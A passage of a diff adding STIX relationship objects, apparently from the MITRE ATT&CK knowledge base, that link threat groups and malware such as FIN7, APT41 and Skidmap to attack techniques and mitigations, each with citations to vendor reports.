+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "intrusion-set--2e290bfe-93b5-48ce-97d6-edcd6d32b7cf",
+ "target_ref": "attack-pattern--391d824f-0ef1-47a0-b0ee-c59a75e27670",
+ "external_references": [
+ {
+ "source_name": "ESET Gamaredon June 2020",
+ "url": "https://www.welivesecurity.com/2020/06/11/gamaredon-group-grows-its-game/",
+ "description": "Boutin, J. (2020, June 11). Gamaredon group grows its game. Retrieved June 16, 2020."
+ }
+ ],
+ "description": "[Gamaredon Group](https://attack.mitre.org/groups/G0047) malware has used CreateProcess to launch additional malicious components.(Citation: ESET Gamaredon June 2020)",
+ "relationship_type": "uses",
+ "id": "relationship--9c51f7a2-346b-4ef9-ade0-ac2c5c845c27",
+ "type": "relationship",
+ "modified": "2020-06-22T21:18:35.451Z",
+ "created": "2020-06-22T21:18:35.451Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "malware--56e6b6c2-e573-4969-8bab-783205cebbbf",
+ "target_ref": "attack-pattern--df8b2a25-8bdf-4856-953c-a04372b1c161",
+ "external_references": [
+ {
+ "source_name": "McAfee Sharpshooter December 2018",
+ "url": "https://www.mcafee.com/enterprise/en-us/assets/reports/rp-operation-sharpshooter.pdf",
+ "description": "Sherstobitoff, R., Malhotra, A., et. al.. (2018, December 18). Operation Sharpshooter Campaign Targets Global Defense, Critical Infrastructure. Retrieved May 14, 2020."
+ }
+ ],
+ "description": "[Rising Sun](https://attack.mitre.org/software/S0448) has used HTTP for command and control.(Citation: McAfee Sharpshooter December 2018)",
+ "relationship_type": "uses",
+ "id": "relationship--7a0baa06-e3f1-4488-a0f6-ecf405413679",
+ "type": "relationship",
+ "modified": "2020-06-23T00:42:36.296Z",
+ "created": "2020-06-23T00:42:36.296Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "malware--36ede314-7db4-4d09-b53d-81bbfbe5f6f8",
+ "target_ref": "attack-pattern--707399d6-ab3e-4963-9315-d9d3818cd6a0",
+ "external_references": [
+ {
+ "source_name": "Trend Micro Tick November 2019",
+ "url": "https://documents.trendmicro.com/assets/pdf/Operation-ENDTRADE-TICK-s-Multi-Stage-Backdoors-for-Attacking-Industries-and-Stealing-Classified-Data.pdf",
+ "description": "Chen, J. et al. (2019, November). Operation ENDTRADE: TICK\u2019s Multi-Stage Backdoors for Attacking Industries and Stealing Classified Data. Retrieved June 9, 2020."
+ }
+ ],
+ "description": "[Avenger](https://attack.mitre.org/software/S0473) can identify the domain of the compromised host.(Citation: Trend Micro Tick November 2019)",
+ "relationship_type": "uses",
+ "id": "relationship--7fbbab0b-8e78-4352-ad0b-ae9a2eeffba5",
+ "type": "relationship",
+ "modified": "2020-06-24T01:27:32.649Z",
+ "created": "2020-06-23T17:59:53.341Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "intrusion-set--93f52415-0fe4-4d3d-896c-fc9b8e88ab90",
+ "target_ref": "attack-pattern--e64c62cf-9cd7-4a14-94ec-cdaac43ab44b",
+ "external_references": [
+ {
+ "source_name": "Trend Micro Tick November 2019",
+ "url": "https://documents.trendmicro.com/assets/pdf/Operation-ENDTRADE-TICK-s-Multi-Stage-Backdoors-for-Attacking-Industries-and-Stealing-Classified-Data.pdf",
+ "description": "Chen, J. et al. (2019, November). Operation ENDTRADE: TICK\u2019s Multi-Stage Backdoors for Attacking Industries and Stealing Classified Data. Retrieved June 9, 2020."
+ }
+ ],
+ "description": "[BRONZE BUTLER](https://attack.mitre.org/groups/G0060) has used legitimate applications to side-load malicious DLLs.(Citation: Trend Micro Tick November 2019)",
+ "relationship_type": "uses",
+ "id": "relationship--881b3ad2-38dd-45b0-b75b-49acf6f7c6a3",
+ "type": "relationship",
+ "modified": "2020-06-24T01:29:47.695Z",
+ "created": "2020-06-23T18:12:47.888Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "course-of-action--a6a47a06-08fc-4ec4-bdc3-20373375ebb9",
+ "target_ref": "attack-pattern--dfd7cc1d-e1d8-4394-a198-97c4cab8aa67",
+ "relationship_type": "mitigates",
+ "description": "Anti-virus can be used to automatically quarantine suspicious files. ",
+ "id": "relationship--1461fa53-bc4f-4ae5-b131-3f6058e6a72a",
+ "type": "relationship",
+ "modified": "2020-06-25T03:32:51.267Z",
+ "created": "2020-06-23T18:34:17.840Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "course-of-action--a6a47a06-08fc-4ec4-bdc3-20373375ebb9",
+ "target_ref": "attack-pattern--7385dfaf-6886-4229-9ecd-6fd678040830",
+ "relationship_type": "mitigates",
+ "description": "Anti-virus can be used to automatically quarantine suspicious files. ",
+ "id": "relationship--8d56622d-547a-4daa-89b8-1c555d1ac5b7",
+ "type": "relationship",
+ "modified": "2020-06-25T03:19:34.298Z",
+ "created": "2020-06-23T18:59:50.979Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "course-of-action--a6a47a06-08fc-4ec4-bdc3-20373375ebb9",
+ "target_ref": "attack-pattern--970a3432-3237-47ad-bcca-7d8cbb217736",
+ "relationship_type": "mitigates",
+ "description": "Anti-virus can be used to automatically quarantine suspicious files. ",
+ "id": "relationship--758cbc32-6b33-4012-8622-cd7d218a799c",
+ "type": "relationship",
+ "modified": "2020-06-24T13:51:22.649Z",
+ "created": "2020-06-23T19:02:21.529Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "course-of-action--a6a47a06-08fc-4ec4-bdc3-20373375ebb9",
+ "target_ref": "attack-pattern--cc3502b5-30cc-4473-ad48-42d51a6ef6d1",
+ "relationship_type": "mitigates",
+ "description": "Anti-virus can be used to automatically quarantine suspicious files. ",
+ "id": "relationship--70b511c9-5a2c-4810-87b6-73dfc648ec29",
+ "type": "relationship",
+ "modified": "2020-06-23T19:03:15.337Z",
+ "created": "2020-06-23T19:03:15.337Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "course-of-action--21da4fd4-27ad-4e9c-b93d-0b9b14d02c96",
+ "target_ref": "attack-pattern--0f4a0c76-ab2d-4cb0-85d3-3f0efb8cba0d",
+ "relationship_type": "mitigates",
+ "description": "Script blocking extensions can help prevent the execution of JavaScript and HTA files that may commonly be used during the exploitation process. For malicious code served up through ads, adblockers can help prevent that code from executing in the first place.",
+ "id": "relationship--b432bca9-8f75-431d-b0af-f43623e287d4",
+ "type": "relationship",
+ "modified": "2020-06-25T03:23:13.985Z",
+ "created": "2020-06-23T19:12:25.103Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "course-of-action--47e0e9fe-96ce-4f65-8bb1-8be1feacb5db",
+ "target_ref": "attack-pattern--0f4a0c76-ab2d-4cb0-85d3-3f0efb8cba0d",
+ "relationship_type": "mitigates",
+ "description": "Denylist scripting where appropriate.",
+ "id": "relationship--5853af0d-4716-4290-b3d9-63fadfd5f554",
+ "type": "relationship",
+ "modified": "2020-06-25T03:23:14.008Z",
+ "created": "2020-06-23T19:12:25.113Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "course-of-action--eb88d97c-32f1-40be-80f0-d61a4b0b4b31",
+ "target_ref": "attack-pattern--0f4a0c76-ab2d-4cb0-85d3-3f0efb8cba0d",
+ "relationship_type": "mitigates",
+ "description": "Turn off or restrict access to unneeded scripting components.",
+ "id": "relationship--a2eb983e-f4ad-45a3-9348-088bbfdbab77",
+ "type": "relationship",
+ "modified": "2020-06-25T03:23:14.006Z",
+ "created": "2020-06-23T19:12:25.119Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "attack-pattern--0f4a0c76-ab2d-4cb0-85d3-3f0efb8cba0d",
+ "target_ref": "attack-pattern--7385dfaf-6886-4229-9ecd-6fd678040830",
+ "relationship_type": "subtechnique-of",
+ "id": "relationship--f9867ca2-18a1-4e84-ad1d-61d7c85fe4b3",
+ "type": "relationship",
+ "modified": "2020-06-23T19:12:25.121Z",
+ "created": "2020-06-23T19:12:25.121Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "course-of-action--21da4fd4-27ad-4e9c-b93d-0b9b14d02c96",
+ "target_ref": "attack-pattern--dfd7cc1d-e1d8-4394-a198-97c4cab8aa67",
+ "relationship_type": "mitigates",
+ "description": "Script blocking extensions can help prevent the execution of scripts and HTA files that may commonly be used during the exploitation process. For malicious code served up through ads, adblockers can help prevent that code from executing in the first place.",
+ "id": "relationship--a6360da7-8678-4d7c-a866-6f2a982a23ba",
+ "type": "relationship",
+ "modified": "2020-06-25T03:32:51.320Z",
+ "created": "2020-06-23T19:13:13.413Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "course-of-action--21da4fd4-27ad-4e9c-b93d-0b9b14d02c96",
+ "target_ref": "attack-pattern--7385dfaf-6886-4229-9ecd-6fd678040830",
+ "relationship_type": "mitigates",
+ "description": "Script blocking extensions can help prevent the execution of scripts and HTA files that may commonly be used during the exploitation process. For malicious code served up through ads, adblockers can help prevent that code from executing in the first place.",
+ "id": "relationship--d4dbffc2-246d-4fd4-8c3c-0e7901aaef05",
+ "type": "relationship",
+ "modified": "2020-06-25T03:19:34.302Z",
+ "created": "2020-06-23T19:14:12.712Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "malware--04fc1842-f9e4-47cf-8cb8-5c61becad142",
+ "target_ref": "attack-pattern--0f4a0c76-ab2d-4cb0-85d3-3f0efb8cba0d",
+ "external_references": [
+ {
+ "description": "Namestnikov, Y. and Aime, F. (2019, May 8). FIN7.5: the infamous cybercrime rig \u201cFIN7\u201d continues its activities. Retrieved October 11, 2019.",
+ "url": "https://securelist.com/fin7-5-the-infamous-cybercrime-rig-fin7-continues-its-activities/90703/",
+ "source_name": "SecureList Griffon May 2019"
+ }
+ ],
+ "description": "[GRIFFON](https://attack.mitre.org/software/S0417) is written in and executed as [JavaScript/JScript](https://attack.mitre.org/techniques/T1059/007).(Citation: SecureList Griffon May 2019)\t",
+ "relationship_type": "uses",
+ "id": "relationship--58801cab-349a-4f09-b449-149b19bcf085",
+ "type": "relationship",
+ "modified": "2020-06-23T19:20:46.002Z",
+ "created": "2020-06-23T19:20:46.002Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "malware--ade37ada-14af-4b44-b36c-210eec255d53",
+ "target_ref": "attack-pattern--b4694861-542c-48ea-9eb1-10d356e7140a",
+ "external_references": [
+ {
+ "source_name": "Cybereason Valak May 2020",
+ "url": "https://www.cybereason.com/blog/valak-more-than-meets-the-eye",
+ "description": "Salem, E. et al. (2020, May 28). VALAK: MORE THAN MEETS THE EYE . Retrieved June 19, 2020."
+ }
+ ],
+ "description": "[Valak](https://attack.mitre.org/software/S0476) can collect sensitive mailing information from Exchange servers, including credentials and the domain certificate of an enterprise.(Citation: Cybereason Valak May 2020)",
+ "relationship_type": "uses",
+ "id": "relationship--99dfbbaa-5e58-4a03-9b94-fb6962681ce3",
+ "type": "relationship",
+ "modified": "2020-06-24T01:11:43.031Z",
+ "created": "2020-06-23T19:30:44.853Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "intrusion-set--dc6fe6ee-04c2-49be-ba3d-f38d2463c02a",
+ "target_ref": "attack-pattern--0f4a0c76-ab2d-4cb0-85d3-3f0efb8cba0d",
+ "external_references": [
+ {
+ "source_name": "Talos Cobalt Group July 2018",
+ "description": "Svajcer, V. (2018, July 31). Multiple Cobalt Personality Disorder. Retrieved September 5, 2018.",
+ "url": "https://blog.talosintelligence.com/2018/07/multiple-cobalt-personality-disorder.html"
+ },
+ {
+ "source_name": "PTSecurity Cobalt Group Aug 2017",
+ "description": "Positive Technologies. (2017, August 16). Cobalt Strikes Back: An Evolving Multinational Threat to Finance. Retrieved September 5, 2018.",
+ "url": "https://www.ptsecurity.com/upload/corporate/ww-en/analytics/Cobalt-2017-eng.pdf"
+ },
+ {
+ "source_name": "Group IB Cobalt Aug 2017",
+ "description": "Matveeva, V. (2017, August 15). Secrets of Cobalt. Retrieved October 10, 2018.",
+ "url": "https://www.group-ib.com/blog/cobalt"
+ },
+ {
+ "description": "Gorelik, M. (2018, October 08). Cobalt Group 2.0. Retrieved November 5, 2018.",
+ "url": "https://blog.morphisec.com/cobalt-gang-2.0",
+ "source_name": "Morphisec Cobalt Gang Oct 2018"
+ },
+ {
+ "source_name": "Unit 42 Cobalt Gang Oct 2018",
+ "url": "https://researchcenter.paloaltonetworks.com/2018/10/unit42-new-techniques-uncover-attribute-cobalt-gang-commodity-builders-infrastructure-revealed/",
+ "description": "Unit 42. (2018, October 25). New Techniques to Uncover and Attribute Financial actors Commodity Builders and Infrastructure Revealed. Retrieved December 11, 2018."
+ },
+ {
+ "description": "Giagone, R., Bermejo, L., and Yarochkin, F. (2017, November 20). Cobalt Strikes Again: Spam Runs Use Macros and CVE-2017-8759 Exploit Against Russian Banks. Retrieved March 7, 2019.",
+ "url": "https://blog.trendmicro.com/trendlabs-security-intelligence/cobalt-spam-runs-use-macros-cve-2017-8759-exploit/",
+ "source_name": "TrendMicro Cobalt Group Nov 2017"
+ }
+ ],
+ "description": "[Cobalt Group](https://attack.mitre.org/groups/G0080) has executed JavaScript scriptlets on the victim's machine.(Citation: Talos Cobalt Group July 2018)(Citation: PTSecurity Cobalt Group Aug 2017)(Citation: Group IB Cobalt Aug 2017)(Citation: Morphisec Cobalt Gang Oct 2018)(Citation: Unit 42 Cobalt Gang Oct 2018)(Citation: TrendMicro Cobalt Group Nov 2017)",
+ "relationship_type": "uses",
+ "id": "relationship--8e8bebc7-14ff-4c84-a2a4-472446c5897a",
+ "type": "relationship",
+ "modified": "2020-06-23T19:41:51.743Z",
+ "created": "2020-06-23T19:41:51.743Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "intrusion-set--3753cc21-2dae-4dfb-8481-d004e74502cc",
+ "target_ref": "attack-pattern--0f4a0c76-ab2d-4cb0-85d3-3f0efb8cba0d",
+ "external_references": [
+ {
+ "url": "https://www.fireeye.com/blog/threat-research/2018/08/fin7-pursuing-an-enigmatic-and-evasive-global-criminal-operation.html",
+ "description": "Carr, N., et al. (2018, August 01). On the Hunt for FIN7: Pursuing an Enigmatic and Evasive Global Criminal Operation. Retrieved August 23, 2018.",
+ "source_name": "FireEye FIN7 Aug 2018"
+ },
+ {
+ "source_name": "Flashpoint FIN 7 March 2019",
+ "url": "https://www.flashpoint-intel.com/blog/fin7-revisited-inside-astra-panel-and-sqlrat-malware/",
+ "description": "Platt, J. and Reeves, J.. (2019, March). FIN7 Revisited: Inside Astra Panel and SQLRat Malware. Retrieved June 18, 2019."
+ },
+ {
+ "url": "https://www.fireeye.com/blog/threat-research/2018/08/fin7-pursuing-an-enigmatic-and-evasive-global-criminal-operation.html",
+ "description": "Carr, N., et al. (2018, August 01). On the Hunt for FIN7: Pursuing an Enigmatic and Evasive Global Criminal Operation. Retrieved August 23, 2018.",
+ "source_name": "FireEye FIN7 Aug 2018"
+ }
+ ],
+ "description": "[FIN7](https://attack.mitre.org/groups/G0046) used JavaScript scripts to help perform tasks on the victim's machine.(Citation: FireEye FIN7 Aug 2018)(Citation: Flashpoint FIN 7 March 2019)(Citation: FireEye FIN7 Aug 2018)",
+ "relationship_type": "uses",
+ "id": "relationship--72b1c4ab-81ca-47a4-a541-ceb44580c87b",
+ "type": "relationship",
+ "modified": "2020-06-24T19:03:20.236Z",
+ "created": "2020-06-23T19:53:58.405Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "intrusion-set--df71bb3b-813c-45eb-a8bc-f2a419837411",
+ "target_ref": "attack-pattern--7385dfaf-6886-4229-9ecd-6fd678040830",
+ "external_references": [
+ {
+ "source_name": "Kaspersky MoleRATs April 2019",
+ "url": "https://securelist.com/gaza-cybergang-group1-operation-sneakypastes/90068/",
+ "description": "GReAT. (2019, April 10). Gaza Cybergang Group1, operation SneakyPastes. Retrieved May 13, 2020."
+ }
+ ],
+ "description": "[Molerats](https://attack.mitre.org/groups/G0021) used various implants, including those built on .NET, on target machines.(Citation: Kaspersky MoleRATs April 2019)\t",
+ "relationship_type": "uses",
+ "id": "relationship--7321f0a3-afab-462b-808d-ac85978a9b0c",
+ "type": "relationship",
+ "modified": "2020-06-24T19:11:10.751Z",
+ "created": "2020-06-23T20:00:58.628Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "attack-pattern--f244b8dd-af6c-4391-a497-fc03627ce995",
+ "target_ref": "attack-pattern--853c4192-4311-43e1-bfbb-b11b14911852",
+ "relationship_type": "subtechnique-of",
+ "id": "relationship--d2468213-1073-43d0-bd10-020b23597a6f",
+ "type": "relationship",
+ "modified": "2020-06-23T22:28:28.085Z",
+ "created": "2020-06-23T22:28:28.085Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "course-of-action--787fb64d-c87b-4ee5-a341-0ef17ec4c15c",
+ "target_ref": "attack-pattern--f244b8dd-af6c-4391-a497-fc03627ce995",
+ "relationship_type": "mitigates",
+ "description": "[Environmental Keying](https://attack.mitre.org/techniques/T1480/001) likely should not be mitigated with preventative controls because it may protect unintended targets from being compromised. If targeted, efforts should be focused on preventing adversary tools from running earlier in the chain of activity and on identifying subsequent malicious behavior if compromised.",
+ "id": "relationship--9a513f75-f09b-4840-8654-521fa4ff59fa",
+ "type": "relationship",
+ "modified": "2020-06-24T18:52:12.858Z",
+ "created": "2020-06-23T22:35:10.751Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "intrusion-set--4ca1929c-7d64-4aab-b849-badbfc0c760d",
+ "target_ref": "attack-pattern--bf147104-abf9-4221-95d1-e81585859441",
+ "external_references": [
+ {
+ "source_name": "FireEye Outlook Dec 2019",
+ "url": "https://www.fireeye.com/blog/threat-research/2019/12/breaking-the-rules-tough-outlook-for-home-page-attacks.html",
+ "description": "McWhirt, M., Carr, N., Bienstock, D. (2019, December 4). Breaking the Rules: A Tough Outlook for Home Page Attacks (CVE-2017-11774). Retrieved June 23, 2020."
+ }
+ ],
+ "description": "[OilRig](https://attack.mitre.org/groups/G0049) has abused the Outlook Home Page feature for persistence. [OilRig](https://attack.mitre.org/groups/G0049) has also used CVE-2017-11774 to roll back the initial patch designed to protect against Home Page abuse.(Citation: FireEye Outlook Dec 2019)",
+ "relationship_type": "uses",
+ "id": "relationship--3c367277-6168-4df8-b982-e9949994123d",
+ "type": "relationship",
+ "modified": "2020-06-24T00:26:37.174Z",
+ "created": "2020-06-24T00:26:37.174Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "intrusion-set--18854f55-ac7c-4634-bd9a-352dd07613b7",
+ "target_ref": "attack-pattern--f244b8dd-af6c-4391-a497-fc03627ce995",
+ "external_references": [
+ {
+ "source_name": "Twitter ItsReallyNick APT41 EK",
+ "url": "https://twitter.com/ItsReallyNick/status/1189622925286084609",
+ "description": "Carr, N. (2019, October 30). Nick Carr Status Update APT41 Environmental Keying. Retrieved June 23, 2020."
+ }
+ ],
+ "description": "[APT41](https://attack.mitre.org/groups/G0096) has encrypted payloads using the Data Protection API (DPAPI), which relies on keys tied to specific user accounts on specific machines. [APT41](https://attack.mitre.org/groups/G0096) has also environmentally keyed second stage malware with an RC5 key derived in part from the infected system's volume serial number.(Citation: Twitter ItsReallyNick APT41 EK)",
+ "relationship_type": "uses",
+ "id": "relationship--5212a108-111b-4467-84c9-933d2b84aad2",
+ "type": "relationship",
+ "modified": "2020-06-24T00:51:25.879Z",
+ "created": "2020-06-24T00:51:25.879Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "course-of-action--987988f0-cf86-4680-a875-2f6456ab2448",
+ "target_ref": "attack-pattern--6b57dc31-b814-4a03-8706-28bc20d739c4",
+ "relationship_type": "mitigates",
+ "description": "Restrict access to the authorized_keys file.",
+ "id": "relationship--3bc431bd-f093-4daf-b264-e73f1fcf591a",
+ "type": "relationship",
+ "modified": "2020-06-25T16:32:23.561Z",
+ "created": "2020-06-24T12:42:35.446Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "course-of-action--eb88d97c-32f1-40be-80f0-d61a4b0b4b31",
+ "target_ref": "attack-pattern--6b57dc31-b814-4a03-8706-28bc20d739c4",
+ "relationship_type": "mitigates",
+ "description": "Disable SSH if it is not necessary on a host or restrict SSH access for specific users/groups using /etc/ssh/sshd_config.",
+ "id": "relationship--8faa230d-ced2-4289-81c5-554fd6dc62fd",
+ "type": "relationship",
+ "modified": "2020-06-25T16:32:23.591Z",
+ "created": "2020-06-24T12:42:35.454Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "attack-pattern--6b57dc31-b814-4a03-8706-28bc20d739c4",
+ "target_ref": "attack-pattern--a10641f4-87b4-45a3-a906-92a149cb2c27",
+ "relationship_type": "subtechnique-of",
+ "id": "relationship--8b86fa49-6d13-42b4-bd48-814abfd6793f",
+ "type": "relationship",
+ "modified": "2020-06-24T12:42:35.464Z",
+ "created": "2020-06-24T12:42:35.464Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "malware--4b68b5ea-2e1b-4225-845b-8632f702b9a0",
+ "target_ref": "attack-pattern--6b57dc31-b814-4a03-8706-28bc20d739c4",
+ "external_references": [
+ {
+ "source_name": "Trend Micro Skidmap",
+ "url": "https://blog.trendmicro.com/trendlabs-security-intelligence/skidmap-linux-malware-uses-rootkit-capabilities-to-hide-cryptocurrency-mining-payload/",
+ "description": "Remillano, A., Urbanec, J. (2019, September 19). Skidmap Linux Malware Uses Rootkit Capabilities to Hide Cryptocurrency-Mining Payload. Retrieved June 4, 2020."
+ }
+ ],
+ "description": "[Skidmap](https://attack.mitre.org/software/S0468) has the ability to add the public key of its handlers to the authorized_keys file to maintain persistence on an infected host.(Citation: Trend Micro Skidmap)",
+ "relationship_type": "uses",
+ "id": "relationship--13d595d2-9497-4bbe-be74-6e2a3a4dde06",
+ "type": "relationship",
+ "modified": "2020-06-25T13:32:00.164Z",
+ "created": "2020-06-24T13:16:30.364Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "malware--a0ebedca-d558-4e48-8ff7-4bf76208d90c",
+ "target_ref": "attack-pattern--c2e147a9-d1a8-4074-811a-d8789202d916",
+ "external_references": [
+ {
+ "source_name": "Trend Micro Tick November 2019",
+ "url": "https://documents.trendmicro.com/assets/pdf/Operation-ENDTRADE-TICK-s-Multi-Stage-Backdoors-for-Attacking-Industries-and-Stealing-Classified-Data.pdf",
+ "description": "Chen, J. et al. (2019, November). Operation ENDTRADE: TICK\u2019s Multi-Stage Backdoors for Attacking Industries and Stealing Classified Data. Retrieved June 9, 2020."
+ }
+ ],
+ "description": "[ABK](https://attack.mitre.org/software/S0469) can extract a malicious Portable Executable (PE) from a photo.(Citation: Trend Micro Tick November 2019)",
+ "relationship_type": "uses",
+ "id": "relationship--aba32ee8-9eca-45fa-99f3-89e75dbc16a6",
+ "type": "relationship",
+ "modified": "2020-06-24T15:33:08.153Z",
+ "created": "2020-06-24T15:33:08.153Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "malware--f0fc920e-57a3-4af5-89be-9ea594c8b1ea",
+ "target_ref": "attack-pattern--c2e147a9-d1a8-4074-811a-d8789202d916",
+ "external_references": [
+ {
+ "source_name": "Trend Micro Tick November 2019",
+ "url": "https://documents.trendmicro.com/assets/pdf/Operation-ENDTRADE-TICK-s-Multi-Stage-Backdoors-for-Attacking-Industries-and-Stealing-Classified-Data.pdf",
+ "description": "Chen, J. et al. (2019, November). Operation ENDTRADE: TICK\u2019s Multi-Stage Backdoors for Attacking Industries and Stealing Classified Data. Retrieved June 9, 2020."
+ }
+ ],
+ "description": "[BBK](https://attack.mitre.org/software/S0470) can extract a malicious Portable Executable (PE) from a photo.(Citation: Trend Micro Tick November 2019)",
+ "relationship_type": "uses",
+ "id": "relationship--3811b12a-fcfc-47d2-83ec-89df60ca4c21",
+ "type": "relationship",
+ "modified": "2020-06-24T15:36:00.917Z",
+ "created": "2020-06-24T15:36:00.917Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "course-of-action--93e7968a-9074-4eac-8ae9-9f5200ec3317",
+ "target_ref": "attack-pattern--77532a55-c283-4cd2-bc5d-2d0b65e9d88c",
+ "relationship_type": "mitigates",
+ "description": "Ensure least privilege principles are applied to Identity and Access Management (IAM) security policies.(Citation: Expel IO Evil in AWS)",
+ "id": "relationship--b29139fc-f053-44f7-9b5f-6029a984474d",
+ "external_references": [
+ {
+ "source_name": "Expel IO Evil in AWS",
+ "url": "https://expel.io/blog/finding-evil-in-aws/",
+ "description": "Anthony Randazzo, Britton Manahan and Sam Lipton. (2020, April 28). Finding Evil in AWS. Retrieved June 25, 2020."
+ }
+ ],
+ "type": "relationship",
